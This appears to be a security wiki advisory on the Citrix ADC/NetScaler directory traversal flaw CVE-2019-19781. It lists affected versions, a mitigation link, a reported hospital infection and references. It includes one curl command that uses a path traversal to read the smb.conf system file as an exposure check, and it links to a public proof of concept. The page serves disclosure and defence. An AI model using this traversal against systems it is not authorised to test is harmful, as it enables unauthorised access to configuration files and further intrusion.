#acl All:read <> = General Disclosure = A directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution. It't going public on 17 December 2019. = POC = If you want to test to see if this exposure is mitigated use the following: {{{ curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is }}} Either a 403 means that you are patched or if it returns a Citrix website and NOT the smb.conf file itself. If you can see smb.conf, then you are vulnerable. There is also a POC available on github: [[https://github.com/trustedsec/cve-2019-19781]] = Affected Systems = Here is a list of the operating systems we have tested which are vulnerable to this attack: * Citrix ADC and Citrix Gateway version 13.0 all supported builds * Citrix ADC and NetScaler Gateway version 12.1 all supported builds * Citrix ADC and NetScaler Gateway version 12.0 all supported builds * Citrix ADC and NetScaler Gateway version 11.1 all supported builds * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds = Possible Mitigations = Citrix has published a possible mitigation on there website. [[https://support.citrix.com/article/CTX267679]] = Infections = * Medisch Centrum Leeuwarden (15 January 2020) * [[https://www.mcl.nl/mcl-actueel/2949-dataverkeer-met-buitenwereld-afgesloten|Press release]] = References = * Citrix * [[https://support.citrix.com/article/CTX267027]] * Nist * [[https://nvd.nist.gov/vuln/detail/CVE-2019-19781]] * NCSC (Dutch) * [[https://www.ncsc.nl/actueel/advisory?id=NCSC%2D2019%2D0979]] * [[https://www.ncsc.nl/actueel/nieuws/2020/januari/9/aanvallers-zoeken-actief-naar-kwetsbare-citrix-servers]] * FireEye *[[https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html]] * Tweakers (Dutch) * [[https://tweakers.net/nieuws/162212/713-citrix-servers-in-nederland-zijn-kwetsbaar-voor-remote-code-execution.html]] * Media * [[https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/]]